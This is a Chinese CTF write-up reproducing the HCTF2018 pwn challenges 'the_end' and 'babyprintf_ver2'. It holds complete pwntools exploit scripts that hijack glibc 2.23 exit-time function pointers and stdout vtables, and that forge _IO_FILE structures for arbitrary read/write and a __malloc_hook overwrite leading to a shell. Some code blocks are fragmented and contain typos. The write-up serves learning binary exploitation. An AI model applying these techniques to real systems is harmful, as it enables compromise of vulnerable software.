

HCTF2018 pwn题复现

相关文件位置

https://gitee.com/hac425/blog_data/tree/master/hctf2018

the_end

程序功能为，首先打印出 `libc` 的地址，然后可以允许任意地址写 5 字节。

解法一

在调用 `exit` 函数时，最终在 `ld.so` 里面的 `_dl_fini` 函数会使用

```
0x7ffff7de7b2e <_dl_fini+126>:    call    QWORD PTR [rip+0x216414]      # 0x7ffff7ffdf48 <_rtld_global+3848>
```

取出 `libc` 里面的一个函数指针，然后跳转过去，所以思路就是写这个函数指针为 `one_gadget`，然后调用 `exit` 时就会拿到 shell。

找这个调用位置时，可以把 `_rtld_global+3848` 改成 0 然后程序崩溃时，看下栈回溯就能找到位置了。

所以 poc 如下

```
#!/usr/bin/python
# -*- coding: UTF-8 -*-
from pwn import *
from time import sleep

context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
# context.terminal = ['tmux', 'splitw', '-v']

path = "/home/hac425/vm_data/pwn/hctf/the_end"
```

```

libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")

p = process(path, aslr=1)

p = remote("127.0.0.1", 10002)

# gdb.attach(p)
# pause()

p.recvuntil("here is a gift ")
leak = p.recvuntil(",", drop=True)
libc.address = int(leak, 16) - libc.symbols['sleep']
info("libc.address: " + hex(libc.address))

one_gadget = p64(libc.address + 0xf02a4)

# call QWORD PTR [rip+0x216414]      # 0xfffff7ffdf48 <_rtld_global+3848>
target = libc.address + 0x5f0f48

sleep(0.1)

for i in range(5):
    p.send(p64(target + i))
    sleep(0.1)
    p.send(one_gadget[i])

p.sendline("exec /bin/sh 1>&0")
p.interactive()

```

因为关闭了 stdout 和 stderr， 使用 exec /bin/sh 1>&0 才能得到一个有回显的 shell，不过貌似只能在使用 socat 挂载的时候能用貌似， 直接 pwntools 起就没有反应。

解法二

利用的是在程序调用 exit 后，会进入

<https://code.woboq.org/userspace/glibc/libio/genops.c.html#817>

函数会遍历 `_IO_list_all` 调用 `fp->vtable->_setbuf` 函数。

这里就可以使用两个字节修改 `stdout->vtable` 到另外一个地址作为 `fake_vtable`，然后使用 3 个字节修改 `fake_vtable ->_setbuf` 为 `one_gadget`。然后到这里时就会执行 `one_gadget`

所以 `fake_vtable` 的要求就是在修改 `fake_vtable ->_setbuf` 低 3 个字节的情况下能变成 `one_gadget` 的地址。因为是部分写，直接在 `vtable` 附近找找就行。

```
from pwn import *
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']

def pwn(p):
    p.recvuntil('here is a gift ')
    libc_base = int(p.recvuntil(',', drop=True), 16) - 0x0CC230
    stdout_vtable = libc_base + 0x3c56f8
    fake_io_jump = 0x3c3fb0 + libc_base
    remote_addr = libc_base + 0x3c4008
    one_gadget = libc_base + 0xF02B0

    gdb.attach(p, """
    break exit
    """)
    pause()

    log.success('libc: {}'.format(hex(libc_base)))
    log.success('stdout_vtable: {}'.format(hex(stdout_vtable)))
    log.success('fake_io_jump: {}'.format(hex(fake_io_jump)))
    log.success('remote_addr: {}'.format(hex(remote_addr)))
    log.success('one_gadget: {}'.format(hex(one_gadget)))
    pause()

#0x3c5c58
```

```
payload = p64(stdout_vtable)
payload += p64(fake_io_jump) [0]
payload += p64(stdout_vtable + 1)
payload += p64(fake_io_jump) [1]

payload += p64(remote_addr)
payload += p64(one_gadget) [0]
payload += p64(remote_addr + 1)
payload += p64(one_gadget) [1]
payload += p64(remote_addr + 2)
payload += p64(one_gadget) [2]

p.send(payload)
p.sendline("exec /bin/sh 1>&0")
p.interactive()

if __name__ == '__main__':
    path = "/home/hac425/vm_data/pwn/hctf/the_end"
    libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
    p = process(path, aslr=0)
    # p = remote("127.0.0.1", 10002)
    pwn(p)
```

babyprintf_ver2

程序的逻辑比较简单，往 `data` 段里的一个 8 字节大小的区域读入 `0x200` 字节，会覆盖掉 `stdout` 指针。

0x200 大小足够大了，可以伪造 `_IO_FILE_plus` 结构体，然后修改 `stdout` 指针为伪造的结构体，不过这里会恢复 `vtable`，所以不能通过改 `vtable` 来实现代码执行。

这题引入了一种新的 FILE 结构体的利用，在能修改 `stdout` 结构体里面的缓冲区指针的情况下，仅调用 `printf` 也能实现任意地址读写。

解法一

首先利用 `write_base` 和 `write_ptr` 进行信息泄露，`leak write_base` 的字符串。

```
target = bin.got['setbuf']

file = p64(0xfbad2887) + p64(pbase + 0x201FB0) # flag + read_ptr
file += p64(target) + p64(target) # read_end + read_base, read_end 和 write_base 要一致
file += p64(target) + p64(target + 0x8) # write_base + write_ptr，利用 write_base 和 write_ptr，leak
file += p64(target) + p64(target) # write_end + buf_base
file += p64(target) + p64(0) # buf_end + save_base
file += p64(0) + p64(0)
file += p64(0) + p64(0)
file += p64(1) + p64(0xffffffffffffffff)
file += p64(0) + p64(buffer + 0x200) # _lock，要指向 *_lock = 0
file += p64(0xffffffffffffffff) + p64(0)
file += p64(buffer + 0x210) + p64(0) # _wide_data，一块可写内存地址
file += p64(0) + p64(0)
file += p64(0x00000000ffffffffff) + p64(0)
file += p64(0) + p64(0)

se(p64(0xdeadbeef) * 2 + p64(buffer + 0x18) + file + '\n')
```

然后利用 `write_ptr` 和 `write_end` 实现任意地址写，貌似是 `printf` 里面有 `memcpy`，导致可以复制输入字符串 `str` 到 `write_ptr`，长度为 `strlen(str)`。

```

file = p64(0xfbdbd2887) + p64(malloc_hook) # flag + read_ptr
file += p64(malloc_hook) + p64(malloc_hook) # read_end + read_base, read_end 和 write_base 要一致
file += p64(malloc_hook) + p64(free_hook) # write_base + write_ptr
file += p64(free_hook + 8) + p64(malloc_hook) # write_end + buf_base
file += p64(malloc_hook) + p64(0) # buf_end + save_base
file += p64(0) + p64(0)
file += p64(0) + p64(0)
file += p64(1) + p64(0xffffffffffffffff)
file += p64(0) + p64(buffer + 0x220)
file += p64(0xffffffffffffffff) + p64(0)
file += p64(buffer + 0x230) + p64(0)
file += p64(0) + p64(0)
file += p64(0x00000000fffffff) + p64(0)
file += p64(0) + p64(0)

one_gadget = 0xaabbccdddeadbeef

se(p64(one_gadget) * 2 + p64(buffer + 0x18) + file + '\n')
info("修改 malloc_hook")

```

这种方式比较新奇，貌似之前都没有提到过。仅仅通过修改 `stdout` 的一些指针，就能在 `printf` 的时候实现任意地址读写。

最后改 `malloc_hook` 为 `one_gadget`, 然后使用 `%n` 触发 `malloc`.

可以调调 `exp`, 完整 `exp`

```

#!/usr/bin/python

# -*- coding: UTF-8 -*-

from pwn import *
from time import sleep
from utils import *

context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
# context.terminal = ['tmux', 'splitw', '-v']

path = "/home/hac425/vm_data/pwn/hctf/babyprintf_ver2"
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
bin = ELF(path)

p = process(path, aslr=0)

```

```

def ru(x):
    return p.recvuntil(x)

```

```

def se(x):
    p.send(x)

ru('So I change the buffer location to ')

```

```
buffer = int(ru('\n'), 16)
```

```

pbase = buffer - 0x202010
bin.address = pbase
info("pbase: " + hex(pbase))

# pause()

ru('Have fun!')

target = bin.got['setbuf']

file = p64(0xfbad2887) + p64(pbase + 0x201FB0) # flag + read_ptr
file += p64(target) + p64(target) # read_end + read_base, read_end 和 write_base 要一致
file += p64(target) + p64(target + 0x8) # write_base + write_ptr , 利用 write_base 和 write_ptr , leak
file += p64(target) + p64(target) # write_end + buf_base
file += p64(target) + p64(0) # buf_end + save_base
file += p64(0) + p64(0)
file += p64(0) + p64(0)
file += p64(1) + p64(0xffffffffffffffff)
file += p64(0) + p64(buffer + 0x200) # _lock, 要指向 *_lock = 0
file += p64(0xffffffffffffffff) + p64(0)
file += p64(buffer + 0x210) + p64(0) # _wide_data , 一块可写内存地址
file += p64(0) + p64(0)
file += p64(0x00000000ffffffff) + p64(0)
file += p64(0) + p64(0)

se(p64(0xdeadbeef) * 2 + p64(buffer + 0x18) + file + '\n')

ru('permitted!\n')
leak = u64(ru('\x00\x00'))

libc.address = leak - libc.symbols['setbuf']
info("leak : " + hex(leak))
info("libc.address : " + hex(libc.address))
# gdb.attach(p)
# pause()

malloc_hook = libc.symbols['__malloc_hook']
free_hook = libc.symbols['__free_hook']

sleep(0.2)

file = p64(0xfbad2887) + p64(malloc_hook) # flag + read_ptr
file += p64(malloc_hook) + p64(malloc_hook) # read_end + read_base, read_end 和 write_base 要一致
file += p64(malloc_hook) + p64(free_hook) # write_base + write_ptr
file += p64(free_hook + 8) + p64(malloc_hook) # write_end + buf_base

```

```
file += p64(malloc_hook) + p64(0) # buf_end + save_base
file += p64(0) + p64(0)
file += p64(0) + p64(0)
file += p64(1) + p64(0xffffffffffffffff)
file += p64(0) + p64(buffer + 0x220)
file += p64(0xffffffffffffffff) + p64(0)
file += p64(buffer + 0x230) + p64(0)
file += p64(0) + p64(0)
file += p64(0x00000000fffffff) + p64(0)
file += p64(0) + p64(0)
```

```
one_gadget = libc.address + 0x4526a
```

```
# 就是等 printf 时，就会把开头的数据 写到目的地址
se(p64(one_gadget) * 2 + p64(buffer + 0x18) + file + '\n')
info("修改 malloc_hook")
pause()
```

```
sleep(0.5)
```

```
se(' %n\n')
```

```
print(hex(pbase))
print(hex(leak))
```

```
p.interactive()
```

```
"""
# 0x555555756020      stdout
p *(struct _IO_FILE *)0x0000555555756028
"""

```

解法二

来自

<https://ctftime.org/writeup/12124>

从 exp 看的出来这位大佬对 printf 非常的熟悉。下面分析分析 exp

leak 阶段采取的方式是

此时的 file 结构体为，_IO_read_end = _IO_write_base 为要 leak 的起始地址
_IO_write_ptr 为要 leak 数据的终止地址

```
pwndbg> p *(struct _IO_FILE *)0x0000555555756030
$1 = {
    _flags = -72537977,
```

```

    _IO_read_ptr = 0x0,
    _IO_read_end = 0x555555756108 "\340f\t\253\252",
    _IO_read_base = 0x0,
    _IO_write_base = 0x555555756108 "\340f\t\253\252", # 要泄露的地址
    _IO_write_ptr = 0x555555756110 "", # 结尾, 用于计算长度
    _IO_write_end = 0x0,
    _IO_buf_base = 0x0,
    _IO_buf_end = 0x0,
    _IO_save_base = 0x0,
    _IO_backup_base = 0x0,
    _IO_save_end = 0x0,
    _markers = 0x0,
    _chain = 0x0,
    _fileno = 1,
    _flags2 = 0,
    _old_offset = 0,
    _cur_column = 0,
    _vtable_offset = 0 '\000',
    _shortbuf = "",
    _lock = 0x555555756110, # 指向 0 内存
    _offset = 0,
    _codecvt = 0x0,
    _wide_data = 0x0,
    _freeres_list = 0x0,
    _freeres_buf = 0x0,
    _pad5 = 0,
    _mode = 0,
    _unused2 = '\000' <repeats 19 times>
}

```

仅仅设置了一些必要的字段，当 `printf` 时，就能 leak 出 `0x555555756108` 的数据了。

任意地址写的构造就更加的巧妙了。

```

def write(what, where):
    while what:
        p = 'A' * 16
        p += p64(buf + 32)
        p += p64(0)
        # https://code.woob.org/userspace/glibc/libio/fileops.c.html#788
        # 构造这样的结构会把输入数据的最后一个字节写到 where
        p += pack_file(_flags=0xbad2887,
                      _IO_read_end=buf,           ←
                      _IO_buf_base=where,         ←
                      _fileno=1,
                      _lock=buf + 0x100)
        s.sendline(p)
        # 每次写一个字节
        s.sendline(chr(what & 0xff))
        where += 1
        what >>= 8

```

把 `_IO_read_end` 设置为我们输入数据的位置，然后把 `_IO_buf_base` 设置为需要写的位置。

然后第一次调用 `printf` 后，会把其他的字段填充

接着会进入

<https://code.woboq.org/userspace/glibc/libio/fileops.c.html#788>

开始不断往 `_IO_buf_base` 写一字节，最后的结果是 `_IO_buf_base` 会被写入我们输入数据的最后一个字节

`input[strlen(input) - 1]` ---> 即处 `\x00` 外的最后一个字节

可在 `_IO_buf_base` 下读写监视点来查看

此时在发送一个字节长的字符串，会再次往刚刚的位置写这个字节，这样就能实现任意地址 1 字节写。

```
# 每次写一个字节
s.sendline(chr(what & 0xff))
```

多次调用实现任意地址写。然后写 `malloc_hook` 为 `%66000c` 触发 `malloc` 的调用。

完整 exp

```
#!/usr/bin/python
# -*- coding: UTF-8 -*-
from pwn import *
from utils import *

context.aslr = False
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']

# context.terminal = ['tmux', 'splitw', '-v']

# Credits: https://dhavalkapil.com/blogs/FILE-Structure-Exploitation/
def pack_file(_flags=0,
              _IO_read_ptr=0,
              _IO_read_end=0,
              _IO_read_base=0,
              _IO_write_base=0,
              _IO_write_ptr=0,
              _IO_write_end=0,
              _IO_buf_base=0,
              _IO_buf_end=0,
              _IO_save_base=0,
              _IO_backup_base=0,
              _IO_save_end=0,
              _IO_marker=0,
              _IO_chain=0,
              _fileno=0,
              _lock=0):
    struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
```

```

struct = struct.ljust(0x88, "\x00")
struct += p64(_lock)
struct = struct.ljust(0xd8, "\x00")
return struct

def write(what, where):
    while what:
        p = 'A' * 16
        p += p64(buf + 32)
        p += p64(0)
        # https://code.woboq.org/userspace/glibc/libio/fileops.c.html#788
        # 构造这样的结构会把输入数据的最后一个字节写到 where
        p += pack_file(_flags=0xfb8d2887,
                       _IO_read_end=buf,
                       _IO_buf_base=where,
                       _fileno=1,
                       _lock=buf + 0x100)
        s.sendline(p)
        # 每次写一个字节
        s.sendline(chr(what & 0xff))
        where += 1
        what >>= 8

def leak(where):
    p = 'A' * 16
    p += p64(buf + 32)
    p += p64(0)

    """
    此时的 file 结构体为, _IO_read_end = _IO_write_base 为要 leak 的起始地址, _IO_write_ptr 为要 leak 数据的终止地址
    """
    p += pack_file(_flags=0xfb8d2887,
                   _IO_read_end=where,
                   _IO_write_base=where,
                   _IO_write_ptr=where + 8,
                   _fileno=1,
                   _lock=buf + 0x100)
    s.sendline(p)
    s.recvline()
    return u64(s.recv(8))

libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

```

```
ONE_SHOT = 0x4526A
```

```
s = process(' /home/hac425/vm_data/pwn/hctf/babypprintf_ver2')
```

```
s.recvuntil('0x')
```

```
buf = int(s.recv(12), 16)
```

```
print 'buf @ ' + hex(buf)
```

```
gdb.attach(s)
```

```
pause()
```

```
s.recvuntil('Have fun!\n')
```

```
libc_base = leak(buf + 0xf8) - libc.symbols['_IO_file_jumps']
```

```
malloc_hook = libc_base + libc.symbols['__malloc_hook']
```

```
one_shot = libc_base + ONE_SHOT
```

```
print 'libc @ ' + hex(libc_base)
```

```
pause()
```

```
write(one_shot, malloc_hook)
```

```
s.sendline('%66000c')
```

```
# s.recvuntil('\x7f')
```

```
s.interactive()
```

```
"""
```

```
p *(struct _IO_FILE *)0x0000555555756030
```

```
"""
```

参考

<https://xz.aliyun.com/t/3261#toc-2>

<https://xz.aliyun.com/t/3255#toc-13>

<https://ctftime.org/writeup/12124>

来源：<https://www.cnblogs.com/hac425/p/9959748.html>